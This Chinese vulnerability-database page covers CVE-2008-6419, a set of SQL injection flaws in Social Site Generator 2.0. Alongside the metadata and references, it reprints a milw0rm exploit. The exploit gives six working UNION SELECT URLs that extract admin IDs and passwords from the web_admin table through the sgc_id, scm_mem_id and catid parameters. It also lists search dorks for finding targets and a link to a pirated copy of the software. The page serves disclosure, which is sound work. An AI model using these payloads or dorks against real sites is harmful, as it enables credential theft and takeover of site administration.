Social Site Generator多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115319 漏洞类型 SQL注入
发布时间 2008-05-31 更新时间 2009-03-13
CVE编号 CVE-2008-6419 CNNVD-ID CNNVD-200903-129
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5701
https://www.securityfocus.com/bid/29452
https://cxsecurity.com/issue/WLB-2009030147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-129
|漏洞详情
SocialSiteGenerator(SSG)是一款社交网络系统(SNS)平台构建工具。SocialSiteGenerator2.0版本中存在多个SQL注入漏洞。远程攻击者可以借助(1)对display_blog.php的sgc_id参数,(2)对social_my_profile_download.php的scm_mem_id参数,以及(3)对social_forum_subcategories.php的catid参数,执行任意SQL指令。
|漏洞EXP
< -------------------\__________________/------------------- >

#
#
# Application Name        : Social Site Generator
#
# DeMo                        : www.ssgdemo.com
#
#Download                   : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type         : SQL InJeCtiOn
#
# Dork 1                       : display_blog.php
# Dork 2                       : social_my_profile_download
# Dork 3                       : social_forum_subcategories
#
# author                       : DeAr Ev!L
#
#
# Greatz                      : ALLAH
#                                : Genie & Roy5 & Mister-x
#                        
# Team                       : DeLtA MoRoCcAn tEaM
#
#Site Web                   : WwW.BHJA.NeT
#
< -------------------^_________________^------------------- >



< -- bug SQL start -- >

ADMIN :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,admin_id+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+admin_id,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,admin_id+from+web_admin

Password :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,password+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+password,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,password+from+web_admin

< -- bug SQL End -- >

# milw0rm.com [2008-05-31]
|受影响的产品
Social Site Generator Social Site Generator 0
|参考资料

来源:XF
名称:socialsitegenerator-multiple-sql-injection(42777)
链接:http://xforce.iss.net/xforce/xfdb/42777
来源:BID
名称:29452
链接:http://www.securityfocus.com/bid/29452
来源:MILW0RM
名称:5701
链接:http://www.milw0rm.com/exploits/5701
来源:SECUNIA
名称:30462
链接:http://secunia.com/advisories/30462
来源:OSVDB
名称:45861
链接:http://osvdb.org/45861
来源:OSVDB
名称:45860
链接:http://osvdb.org/45860
来源:OSVDB
名称:45859
链接:http://osvdb.org/45859